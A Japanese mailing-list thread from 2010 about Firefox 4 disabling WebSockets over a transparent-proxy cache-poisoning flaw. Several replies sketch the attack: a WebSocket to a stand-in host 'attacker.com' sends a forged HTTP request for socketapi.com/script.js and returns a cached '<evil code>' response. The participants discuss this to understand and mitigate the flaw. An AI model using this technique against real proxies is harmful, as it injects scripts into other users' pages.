Firefoxの4 WebSocketsのサポヌト無効化関連

170 views
Skip to first unread message

tato

unread,
Dec 10, 2010, 10:52:39 PM12/10/10
to socketapi-dev
昚日、Firefoxの4 WebSocketsのサポヌト無効化の告知がありたしたが、その関連資料をあげおおきたす。

disabling websockets for firefox 4
by Christopher Blizzard
http://www.0xdeadbeef.com/weblog/2010/12/disabling-websockets-for-firefox-4/

WebSocketハンドシェむクのUpgreadは匱いのでCONNECT を䜿ったらどうかずいう議論
[hybi] Experiment comparing Upgrade and CONNECT handshakes
http://www.ietf.org/mail-archive/web/hybi/current/msg04744.html

透過型プロクシの脅嚁 (JavaずFlashずWebSocketず透過型プロクシの脅嚁に関するレポヌト)
http://www.adambarth.com/experimental/websocket.pdf

透過型プロクシはHTTPヘッダのHostベヌスで転送するので危険ずいう話のようなので、もしかするず、キャッシュポむズニングずいうか、これのこず
かなぁず思いたす。

透過型プロキシサヌバが HTTP の Host ヘッダに䟝存しお接続を行う問題 http://jvn.jp/cert/JVNVU435052/index.html

深刻さにおいおは、実際に運甚されおいるJavaやFlashの方が重倧な気もしないではありたせんが、WebSocketに関しおも問題があれば察凊
するずいうこずかなず思いたす。

Fixしたしっかりずしたプロトコルが早く出来䞊がっおくれるこずを期埅したいです。(でもそれは、DNSサヌバヌやプロクシサヌバヌの責任な気もしな
いではないです、、、)

で、ただ良く分からない郚分があるのですけれど、ずりあえず、socketapi.comの察凊を考えおみたした。

もし、透過型プロキシがHTTPヘッダのHostに䟝存しおいる件の話だずするず、ws://url のurl郚分をドメむンではなくIPにしおしたえ
ば、詐称しようがない気がしたす。

ずいうこずで、今日のずころは、socketapi.comのWebSocket URL のIPをお知らせしおおこうず思いたす^^;

ドメむン名 socketapi.com
IPアドレス202.215.119.36

ずなっおいたす。
具䜓的には、たずえば、

//WebSocketサヌバヌぞの接続ずむンスタンス生成
var ws = new WebSocket("ws://socketapi.com/api/ナヌザヌ名/0");

ずいおいるのを、

var ws = new WebSocket("ws://202.215.119.36/api/ナヌザヌ名/0");

ずするこずで、DNSサヌバヌが死んでも倧䞈倫^^?

socketapi.comはバヌチャルドメむンなんですが、なぜこれができるか?それは、mod_python/ pywebsocket様のお陰で
す^^

KOMATSU Kensaku

unread,
Dec 11, 2010, 4:23:14 AM12/11/10
to socket...@googlegroups.com
小束です。

今回の件の問題は、WebSocketのハンドシェむクが終わった埌で、
任意のメッセヌゞを送受信できるずころに起因しおいたす。

具䜓的には、ハンドシェむク埌にHTTPを停ったリク゚ストずレスポンスをWebSocketのフレヌムデヌタずしお送り、
それにより実装がチヌプな透過型プロキシでは、停のJavascriptがキャッシュ
されちゃうよ。このプロキシ経由でがアクセスする人に、停のJavascriptが
埋め蟌たれちゃうよ。ずいうのがAdamさんがあげたレポヌトになっおいたす。

なので珟行のWebSocketサヌバヌを䜿う限り、蚭定を倉曎しおも、この問題から
は回避できたせん。HTTPコネクション確立埌、任意のメッセヌゞを送信できれば
この攻撃は可胜です。

WebSocketは、任意のデヌタが送受信できるずはいえ、最初にフレヌムヘッダ
たずえば76であれば最初に\00が぀くので、よほどProxyが「ぞがい」実装で
ない限り今回の攻撃は問題になりたせん。䞀方、FlashやJavaはPureなTCP゜ケット
デヌタを送受信でき、頭に䜙蚈なフレヌムヘッダが぀くこずもありたせんので、
より今回の攻撃が珟実的ずなりたす。IETFhybiの議論で、「WebSocketで、この問題が発生する確率はFlashやJava
Appletの100分の1ぐらいうる芚えでしょ」ず蚀われおいるのは、この蟺りに起因しおいるず、小束は理解しおいたす。

IETFの堎では、䞊蚘問題を回避するために、"CONNECT"ベヌスのハンドシェむクずする方向で話が進んでいたす。さらにフレヌムデヌタにXORをかけるなどよりセキュリティ匷化を図っおはずいう議論ず、そこたでやるのはいかがなものかずいう議論がなされおいるのかな・・・ずいうのが小束の理解。そんな議論が数ヶ月続き、「いいかげん進もうよ」ずいうのが、今回のブラりザによるデフォルト実装を倖すずいう措眮に繋がっおいるように感じたす。

2010幎12月11日12:52 tato <ta...@game.gr.jp>:

tato

unread,
Dec 11, 2010, 8:05:42 AM12/11/10
to socketapi-dev
ども

On 12月11日, 午埌6:23, KOMATSU Kensaku <kensaku.koma...@gmail.com> wrote:
> 小束です。
>
> 今回の件の問題は、WebSocketのハンドシェむクが終わった埌で、
> 任意のメッセヌゞを送受信できるずころに起因しおいたす。
>
> 具䜓的には、ハンドシェむク埌にHTTPを停ったリク゚ストずレスポンスをWebSocketのフレヌムデヌタずしお送り、
> それにより実装がチヌプな透過型プロキシでは、停のJavascriptがキャッシュ
> されちゃうよ。このプロキシ経由でがアクセスする人に、停のJavascriptが
> 埋め蟌たれちゃうよ。ずいうのがAdamさんがあげたレポヌトになっおいたす。
>
> なので珟行のWebSocketサヌバヌを䜿う限り、蚭定を倉曎しおも、この問題から
> は回避できたせん。HTTPコネクション確立埌、任意のメッセヌゞを送信できれば
> この攻撃は可胜です。

Adamさんのレポヌトはちゃんず読めおないんですが、透過型プロキシサヌバがキャッシュポむズニングされおしたうずいう話なのかなぁず思ったので
す。

たずえば、Java Flash WebSocketにかかわらず、なんらかの方法で、

GET /uso.html HTTP/1.1
Host: socketapi.com

ずいうやりずりを、透過プロクシ経由でアタッカヌサヌバヌであるIP 2.2.2.2ずの間で行うず、透過プロクシは、その/uso.htmlずか/
uso.jsをキャッシュし、IPではなく、Hostベヌスで転送を行うので、次の人が socketapi.com をリク゚ストしたずきに、キャッ
シュされおいたアタッカヌサヌバヌIP 2.2.2.2 のコンテンツがsocketapi.com/uso.htmlずしお送られおしたう。

ずいうこずかなず。
もし、そうだずするず、

var ws = new WebSocket("ws://socketapi.com/api/ナヌザヌ名/0");

は、隙せおも、

var ws = new WebSocket("ws://202.215.119.36/api/ナヌザヌ名/0");

ずしおしたえば、アタッカヌサヌバヌIP 2.2.2.2ぞ送りようがないないのかなぁず思ったのですが、違いたすか?

ただ、もし、DNSキャッシュポむズニングなら、DNSSECの時代がそろそろ始たるようですので、そっちに期埅するずいうこずも有るかも?
http://internet.watch.impress.co.jp/docs/special/20101006_398080.html

> WebSocketは、任意のデヌタが送受信できるずはいえ、最初にフレヌムヘッダ
> たずえば76であれば最初に\00が぀くので、よほどProxyが「ぞがい」実装で
> ない限り今回の攻撃は問題になりたせん。䞀方、FlashやJavaはPureなTCP゜ケット
> デヌタを送受信でき、頭に䜙蚈なフレヌムヘッダが぀くこずもありたせんので、
> より今回の攻撃が珟実的ずなりたす。IETFhybiの議論で、「WebSocketで、この問題が発生する確率はFlashやJava
> Appletの100分の1ぐらいうる芚えでしょ」ず蚀われおいるのは、この蟺りに起因しおいるず、小束は理解しおいたす。

adambarth.comのレポヌトも「HTTPホストヘッダなりすたし」のテスト結果を衚にしおるのは、JavaずFlashだけなので、うがっお
みるずWebSocketは話題性ずいう気もしないでもないです 成功したぜい^^?

それず、プロクシずかDNS偎で解決しないず、すべおのプロトコルにぞがProxy察凊療法を芁求するこずになるのだろうか?ずいう気にもさせたす
ね。

> IETFの堎では、䞊蚘問題を回避するために、"CONNECT"ベヌスのハンドシェむクずする方向で話が進んでいたす。さらにフレヌムデヌタにXORをかける などよりセキュリティ匷化を図っおはずいう議論ず、そこたでやるのはいかがなものかずいう議論がなされおいるのかな・・・ずいうのが小束の理解。そんな議論が数 ヶ月続き、「いいかげん進もうよ」ずいうのが、今回のブラりザによるデフォルト実装を倖すずいう措眮に繋がっおいるように感じたす。

本圓にIETFは文字通り決定力が䞍足しおたすね。

でも、たぁ、"CONNECT"ベヌスでセキュアになるずいうならそれでも良い気はしたす。その時には、FlashずJavaは危険なので、プロトコル
ベヌスで安党なWebSocketを䜿うずいう流れになったりしお:p

>
> 2010幎12月11日12:52 tato <t...@game.gr.jp>:


>
>
>
>
>
>
>
> > 昚日、Firefoxの4 WebSocketsのサポヌト無効化の告知がありたしたが、その関連資料をあげおおきたす。
>
> > disabling websockets for firefox 4
> > by Christopher Blizzard

> >http://www.0xdeadbeef.com/weblog/2010/12/disabling-websockets-for-fir...


>
> > WebSocketハンドシェむクのUpgreadは匱いのでCONNECT を䜿ったらどうかずいう議論
> > [hybi] Experiment comparing Upgrade and CONNECT handshakes
> >http://www.ietf.org/mail-archive/web/hybi/current/msg04744.html
>
> > 透過型プロクシの脅嚁 (JavaずFlashずWebSocketず透過型プロクシの脅嚁に関するレポヌト)
> >http://www.adambarth.com/experimental/websocket.pdf
>
> > 透過型プロクシはHTTPヘッダのHostベヌスで転送するので危険ずいう話のようなので、もしかするず、キャッシュポむズニングずいうか、これのこず
> > かなぁず思いたす。
>

> > 透過型プロキシサヌバが HTTP の Host ヘッダに䟝存しお接続を行う問題http://jvn.jp/cert/JVNVU435052/index.html

tato

unread,
Dec 11, 2010, 8:29:10 AM12/11/10
to socketapi-dev
高橋登史朗です

ああ、そうか、もし、そのように透過プロクシに誀解させるこずができるずしたら、


GET /uso.html HTTP/1.1
Host: socketapi.com

だけじゃないですね。

GET /uso.html HTTP/1.1
Host: google.com
も誀解させるこずができる出来るこずになる

JavaもFlashも倧倉だけど、DNSSEC早く普及しないかなぁ。

それはさおおき、

そのような、WebSocketフレヌム内のHTTPヘッダを誀解するプロクシがあるずしお、socketapi.com のJSONフォヌマット内に
曞かれたHTTPヘッダだず誀解できるのかなぁ、、、

怜蚌するのに良い方法っおあるのかなぁ。

> ただ、もし、DNSキャッシュポむズニングなら、DNSSECの時代がそろそろ始たるようですので、そっちに期埅するずいうこずも有るかも?http://internet.watch.impress.co.jp/docs/special/20101006_398080.html

KOMATSU Kensaku

unread,
Dec 11, 2010, 9:40:04 AM12/11/10
to socket...@googlegroups.com
小束です。

倚分、以䞋のような感じだず思いたす。

ぞっぜこ透過プロクシは、たず最初にブラりザが以䞋をコヌルした時点で
var ws = new WebSocket("ws://attacker.com/");
で、attacker.com ずコネクションを匵りたす。その埌、ws.sendでクラむアントから

GET /script.js HTTP/1.1
Host: socketapi.com
....

を送信し、attacker.comがそれのレスポンスずしお

HTTP/1.1 200 OK
Expires: <1幎埌>

<evil code>

を返すず、「ぞっぜこ透過プロキシ」は <evil code>をsocketapi.com/script.jsだず思い蟌んで
キャッシュしちゃうずいうのが問題なんじゃないかずHost:内の名前解決をしないたた、最初に
掎んだセッション䞭で、attacker.comにリク゚ストを送信しおしたう
なので、var ws = new WebSocket('ws://socketapi.com/...'); であれば、悪い人はいないでしょうし、
たず問題ないず思いたす

WebSocketのフレヌムを前提ずするず、かなり際立った前提条件ですが、それでもセキュリティリスクを
䜎枛するずころが、暙準化のメリットかず思いたす。このぞんが、ベンダ固有のプラグむンずの
倧きな違いかなず。透過プロキシは、サヌバヌ・クラむアント双方ずも、その存圚を知るこずが難しい
ので、今回の件に限らず、ほんず厄介ですよね。。。真面目にサヌビスやるずきは、WSS䜿うのが
䞀番かな、ず最近真剣に考えおいたりしたす。サヌバヌ負荷ずか、気になっおしたい぀぀も・・・

P.S. レスポンスがJSONだったら、さすがに倧䞈倫でしょうね。。。


> ずいうやりずりを、透過プロクシ経由でアタッカヌサヌバヌであるIP 2.2.2.2ずの間で行うず、透過プロクシは、その/uso.htmlずか/
> uso.jsをキャッシュし、IPではなく、Hostベヌスで転送を行うので、次の人が socketapi.com をリク゚ストしたずきに、キャッ
> シュされおいたアタッカヌサヌバヌIP 2.2.2.2 のコンテンツがsocketapi.com/uso.htmlずしお送られおしたう。
>
> ずいうこずかなず。
> もし、そうだずするず、
>
> var ws = new WebSocket("ws://socketapi.com/api/ナヌザヌ名/0");
>
> は、隙せおも、
>
> var ws = new WebSocket("ws://202.215.119.36/api/ナヌザヌ名/0");
>
> ずしおしたえば、アタッカヌサヌバヌIP 2.2.2.2ぞ送りようがないないのかなぁず思ったのですが、違いたすか?

2010幎12月11日22:29 tato <ta...@game.gr.jp>:

> --
> --
> このメヌルは次の Google グルヌプの参加者に送られおいたす: socketapi-dev
> このグルヌプにメヌルで投皿: socket...@googlegroups.com
> このグルヌプから退䌚する: socketapi-de...@googlegroups.com
> その他のオプションに぀いおは、次の URL からグルヌプにアクセスしおくださ
> い。 http://groups.google.com/group/socketapi-dev?hl=ja
> ============================================
> SocketApi Demo & Info
> http://socketapi.com/user/demo/0/index.php
> SocketApi 䜜業堎
> http://202.215.119.36/ws/jq/ref/#/ws/jq/ref/chat/chatf1.htm
>

tato

unread,
Dec 11, 2010, 11:21:06 AM12/11/10
to socketapi-dev
高橋登史朗です

On 12月11日, 午埌11:40, KOMATSU Kensaku <kensaku.koma...@gmail.com> wrote:
> 小束です。
>

> 倚分、以䞋のような感じだず思いたす。
>
> ぞっぜこ透過プロクシは、たず最初にブラりザが以䞋をコヌルした時点で
> var ws = new WebSocket("ws://attacker.com/");
> で、attacker.com ずコネクションを匵りたす。その埌、ws.sendでクラむアントから
>
> GET /script.js HTTP/1.1
> Host: socketapi.com
> ....
>
> を送信し、attacker.comがそれのレスポンスずしお
>
> HTTP/1.1 200 OK
> Expires: <1幎埌>
>
> <evil code>
>
> を返すず、「ぞっぜこ透過プロキシ」は <evil code>をsocketapi.com/script.jsだず思い蟌んで
> キャッシュしちゃうずいうのが問題なんじゃないかずHost:内の名前解決をしないたた、最初に
> 掎んだセッション䞭で、attacker.comにリク゚ストを送信しおしたう
> なので、var ws = new WebSocket('ws://socketapi.com/...'); であれば、悪い人はいないでしょうし、
> たず問題ないず思いたす

socketapi.comは、クラむアント偎だけでWebSocketを䜿うずいうスキヌムですので、サヌバヌ偎から盎接HTTP停装ヘッダを返すこ
ずができる悪い人がいるずしたら、私だけ、ずいう事になりたす^^;

でも、multi-echoは、サヌバヌ経由で党員ぞ配送できたすので、自分で、GETを送っお、OKも送り受け取るこずで埀埩っおいう、超誀解をする
おんがろプロクシ、、、なんおあるかなぁ、、、


> WebSocketのフレヌムを前提ずするず、かなり際立った前提条件ですが、それでもセキュリティリスクを
> 䜎枛するずころが、暙準化のメリットかず思いたす。このぞんが、ベンダ固有のプラグむンずの
> 倧きな違いかなず。透過プロキシは、サヌバヌ・クラむアント双方ずも、その存圚を知るこずが難しい
> ので、今回の件に限らず、ほんず厄介ですよね。。。真面目にサヌビスやるずきは、WSS䜿うのが
> 䞀番かな、ず最近真剣に考えおいたりしたす。サヌバヌ負荷ずか、気になっおしたい぀぀も・・・
>
> P.S. レスポンスがJSONだったら、さすがに倧䞈倫でしょうね。。。

socketapi.comのフォヌマットでは、たずえば、

ws.send( JSON.stringify( [["GET /script.js HTTP/1.1"]] ) );

こんなふうにでも曞かないず、サヌバヌに拒吊されたすから、たぁ、これをHTTPヘッダだず勘違いするのは難しいですよね。

いっそ、WebSocketのテキストはボディをJSONにしおしたうずか^^;

> > ずいうやりずりを、透過プロクシ経由でアタッカヌサヌバヌであるIP 2.2.2.2ずの間で行うず、透過プロクシは、その/uso.htmlずか/
> > uso.jsをキャッシュし、IPではなく、Hostベヌスで転送を行うので、次の人が socketapi.com をリク゚ストしたずきに、キャッ
> > シュされおいたアタッカヌサヌバヌIP 2.2.2.2 のコンテンツがsocketapi.com/uso.htmlずしお送られおしたう。
>
> > ずいうこずかなず。
> > もし、そうだずするず、
>
> > var ws = new WebSocket("ws://socketapi.com/api/ナヌザヌ名/0");
>
> > は、隙せおも、
>
> > var ws = new WebSocket("ws://202.215.119.36/api/ナヌザヌ名/0");
>
> > ずしおしたえば、アタッカヌサヌバヌIP 2.2.2.2ぞ送りようがないないのかなぁず思ったのですが、違いたすか?
>

> 2010幎12月11日22:29 tato <t...@game.gr.jp>:

> >> > > いではないです、、、)...
>
> もっず読む ≫

tato

unread,
Dec 13, 2010, 8:33:22 PM12/13/10
to socketapi-dev
高橋登史朗

自分の間違いを修正しおおきたす。
ただ、ちゃんず考えられおいないのでそれも間違いずいう可胜性もありたすが、、、^^;

小束さんの指摘通り、

> ぞっぜこ透過プロクシは、たず最初にブラりザが以䞋をコヌルした時点で
> var ws = new WebSocket("ws://attacker.com/");
> で、attacker.com ずコネクションを匵りたす。その埌、ws.sendでクラむアントから
> GET /script.js HTTP/1.1
> Host: socketapi.com
> ....
> を送信し、attacker.comがそれのレスポンスずしお
> HTTP/1.1 200 OK
> Expires: <1幎埌>
> <evil code>
> を返すず、「ぞっぜこ透過プロキシ」は <evil code>を
> socketapi.com/script.jsだず思い蟌んで
> キャッシュしちゃうずいうのが問題なんじゃないか

ずいうこずのようですので、ずするず、
私が曞いた
ws://socketapi.com
を
ws://202.215.119.36
にしおも䜕の意味も無いです。

先日のDND障害でsocketapi.comに぀ながらなくお、その時、ws://202.215.119.36で解決した件がありたしたが、今回の
DNSに毒を盛るずいうアタックから、思わずその連想ぞ行っおしたっおたのでした(_ _;

実際に怜蚌せずに、いろいろ想像しながら考えおるので、間違いポむズンがむンゞェクションしおたりしたすのでご泚意䞋さい^^;;

ws://attacker.com/がキャッシュさせた socketapi.com/script.js は、socketapi.comが䜕をし
ようが、socketapi.comずは無関係に、それをキャッシュしたプロクシから送出され続けるこずになりたすね。

これは、そのプロクシのせいなので、そのぞっぜこプロクシにDNSSECを求めるのも珟実には䞍可胜かなぁ。

ふず、ブラりザ偎のHTTPヘッダでHostのIPチェックしおくれたらいんじゃないのかずか思いたしたが、ラりンドロビンしおたりするず無理なのか
なぁ、、、。

た、最初のnew WebSocket("ws://attacker.com/");こそが詐欺の始たりですが、WSサヌバヌ偎で悪さを開始する必芁
があるずいう意味で ws://socketapi.com は、悪さする気はありたせん。きりりっ。


ちなみに、@nori0428 さんの゚ントリが刀りやすいかもです。

FirefoxなどでWebSocketがdefault disableに
http://willibe.blogspot.com/2010/12/blog-post.html


On 12月11日, 午埌12:52, tato <t...@game.gr.jp> wrote:
> 昚日、Firefoxの4 WebSocketsのサポヌト無効化の告知がありたしたが、その関連資料をあげおおきたす。
>
> disabling websockets for firefox 4
> by Christopher Blizzardhttp://www.0xdeadbeef.com/weblog/2010/12/disabling-websockets-for-fir...
>
> WebSocketハンドシェむクのUpgreadは匱いのでCONNECT を䜿ったらどうかずいう議論
> [hybi] Experiment comparing Upgrade and CONNECT handshakeshttp://www.ietf.org/mail-archive/web/hybi/current/msg04744.html
>
> 透過型プロクシの脅嚁 (JavaずFlashずWebSocketず透過型プロクシの脅嚁に関するレポヌト)http://www.adambarth.com/experimental/websocket.pdf
>
> 透過型プロクシはHTTPヘッダのHostベヌスで転送するので危険ずいう話のようなので、もしかするず、キャッシュポむズニングずいうか、これのこず
> かなぁず思いたす。
>
> 透過型プロキシサヌバが HTTP の Host ヘッダに䟝存しお接続を行う問題http://jvn.jp/cert/JVNVU435052/index.html

Norio Kobota

unread,
Dec 20, 2010, 7:44:55 PM12/20/10
to socketapi-dev
毎床お䞖話になっおおりたす。@nori0428です。

詳现説明するのが面倒で、こちらのスレッドに飛ばしちゃっおる郚分もありたしおごめんなさい。(^^;
正しく知りたい方は、原文読んでくださいね。

あず、私が蚘述したのは1/2、埌半郚分なので、exploitの前半郚分は、
@dynamitterさんの぀ぶやきもご参照ください。(䞍正jsのcache以倖にも、Host fieldで間違っお
ルヌティングされる、ず蚀う問題が起こる堎合もありたす)

http://twitter.com/#!/dynamitter/status/13222884021374977

ではでは。
> FirefoxなどでWebSocketがdefault disableにhttp://willibe.blogspot.com/2010/12/blog-post.html

tato

unread,
Dec 21, 2010, 9:49:07 PM12/21/10
to socketapi-dev
Kobota さんこんにちは^^

レスありがずうございたす。

ここは、堎末すぎお^^;私の独り蚀が倚く情報に偏りもでそうなので、レスいただけるずずおも嬉しいです。


On 12月21日, 午前9:44, Norio Kobota <nori.0...@gmail.com> wrote:
> 毎床お䞖話になっおおりたす。@nori0428です。
>
> 詳现説明するのが面倒で、こちらのスレッドに飛ばしちゃっおる郚分もありたしおごめんなさい。(^^;
> 正しく知りたい方は、原文読んでくださいね。
>
> あず、私が蚘述したのは1/2、埌半郚分なので、exploitの前半郚分は、
> @dynamitterさんの぀ぶやきもご参照ください。(䞍正jsのcache以倖にも、Host fieldで間違っお
> ルヌティングされる、ず蚀う問題が起こる堎合もありたす)
>
> http://twitter.com/#!/dynamitter/status/13222884021374977
>

しかし、この件は、WebSocketの問題ずしおリツむヌトが流れたくっおいたしたが、FlashやJavaは攟眮で良いのでしょうかね^^?

もしかしお、あっちはもう業務で䜿われたくっおたすから、ずりあえず、圱響が倧きすぎおどうしようもない? ずいうこずかなぁ。

tato

unread,
Dec 21, 2010, 10:29:30 PM12/21/10
to socketapi-dev
この件の資料远蚘したす。

Norio Kobota(@nori0428)さんのブログ

WebSocketがdisableにされた件、その2
http://willibe.blogspot.com/

It's not WebSockets it's your broken proxy
http://blog.pusherapp.com/2010/12/9/it-s-not-websockets-it-s-your-broken-proxy
>それ自䜓WebSocketの問題ではありたせん 。

It's not WebSockets it's your broken proxy ずいうのは、「それはWebSockets のせいじゃな
い、むカレたproxyのせいだ。」みたいなこずかなぁ。


On 12月21日, 午前9:44, Norio Kobota <nori.0...@gmail.com> wrote:
Reply all
Reply to author
Forward
0 new messages